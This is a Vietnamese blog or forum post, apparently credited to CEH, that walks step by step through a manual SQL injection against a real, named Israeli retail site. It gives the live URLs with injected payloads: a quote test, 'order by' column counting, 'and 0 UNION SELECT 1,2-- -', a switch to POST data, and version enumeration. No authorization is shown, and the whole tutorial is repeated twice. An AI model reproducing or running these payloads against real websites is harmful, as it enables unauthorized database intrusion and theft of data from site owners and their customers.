Bài liên quan
Đầu tiên chúng ta cùng nhìn site này
Bước 1: Check lỗi
![[Hình: data487c4.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vv5zYt5JIUh1XuKlzxWaPTroe4_jowsoRHjB8qxEFkiffb3dQSkvhqCtChGB7HmQuC5OHeEzXsG-5ATXq-twMbs37I8f8VmMgeQIE5xZ1UMPOEornZnpGyIbB_=s0-d)
Bước 2: Tìm số trường cột
![[Hình: data2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vJqoYDylf11uqEKrmUJ1ZoSAn9Rzs2YmrpLe4zjWD4VDsx-H0002E7nKt7oR_mxO33vHj0UIxMDyB0aD9FF-s5J4CjvU6AaBV3qLdgfpp4iJ5tibvpVDc=s0-d)
![[Hình: data1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sdqU2GK9001oP-bEx_JxePsjkNBADj2ewKRSGiA9QraSRqO_z1MNJ7-UFJWkQBgKKXB-qIGee3EcEvV08qFNxvtt7Z0bgnvaaWoKd5tePEZqmOrRsLelY=s0-d)
Số trường cột cần tìm là 2
Bước 3: Xác định vị trí trường cột bị lỗi
![[Hình: data3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uiCkD9waLSLpnQGsTZk0TLqQ9tNl0b2ZpatJFtr3CIrfACru3khchMJrmEo79oQyk87pDydBtQQ-P0xiAgIbABSWJobTo_eSwa501eu6Jk35kyxG1x-Cw=s0-d)
Sau khi thử mọi cách bypass mà vẫn chưa tìm ra kết quả nên mình chuyển qua phương pháp Post data bằng cách đem: id_catg=206 and 0 UNION SELECT 1,2-- -xuống như trong hình:
![[Hình: data6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tkZfZcBlpjVGq81-ZmnJG9p3iAliiII1v1BpF4CRJLmaVGxYyjtr0UKQpxD4T9J8by3tVNrq280KtWheurozgfaabAx5hoh7cKhWOsohn4iMNBlMl8y8I=s0-d)
Sau đó nhấn chữ Execute thì chúng ta sẽ có kết quả
![[Hình: data4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t8sJdEPMdZLLoSCwePUJWxoA4SkrQHcMumtFXp51JHeyP2GirY52ZS0_gRRNEpy6kyt0caC_EMxpYLi3UJU1hPsoVwHXrNq8BaKplIM8qMe-oeiWpeST8=s0-d)
Tiếp theo chúng ta tìm version
![[Hình: data5.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vYFC46F6WC2KDJoiFX0b7HKvNe_rrDAu6DWnU5WRdJB6xeOMAGgGpZgWff3g7XRJ20FKaM-3DRycfBMDkBDLDoX8n2QC0vimy1c1OrdXydcRsAyc-6FTE=s0-d)
....
P/S: Vì không biết nên đặt tiêu đề như thế nào cho đúng nên nếu sai tiêu đề thì rất mong các bạn thông cảm.
Nguồn CEH
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 Bước 1: Check lỗi
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206' ![[Hình: data487c4.png]](http://www.upsieutoc.com/images/2014/06/08/data487c4.png)
Giao diện website có thay đổi. Chứng tỏ site bị lỗi.
Bước 2: Tìm số trường cột
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 order by 2-- - ![[Hình: data2.jpg]](http://www.upsieutoc.com/images/2014/06/08/data2.jpg)
Giao diện website vẫn bình thường
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 order by 3-- - ![[Hình: data1.jpg]](http://www.upsieutoc.com/images/2014/06/08/data1.jpg)
Giao diện website thay đổi
Số trường cột cần tìm là 2
Bước 3: Xác định vị trí trường cột bị lỗi
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 and 0 UNION SELECT 1,2-- - ![[Hình: data3.jpg]](http://www.upsieutoc.com/images/2014/06/08/data3.jpg)
Không tìm thấy cột lỗi
Sau khi thử mọi cách bypass mà vẫn chưa tìm ra kết quả nên mình chuyển qua phương pháp Post data bằng cách đem: id_catg=206 and 0 UNION SELECT 1,2-- -xuống như trong hình:
![[Hình: data6.jpg]](http://www.upsieutoc.com/images/2014/06/08/data6.jpg)
Sau đó nhấn chữ Execute thì chúng ta sẽ có kết quả
![[Hình: data4.jpg]](http://www.upsieutoc.com/images/2014/06/08/data4.jpg)
Lỗi cột 1
Tiếp theo chúng ta tìm version
![[Hình: data5.jpg]](http://www.upsieutoc.com/images/2014/06/08/data5.jpg)
P/S: Vì không biết nên đặt tiêu đề như thế nào cho đúng nên nếu sai tiêu đề thì rất mong các bạn thông cảm.
Nguồn CEH
Post a Comment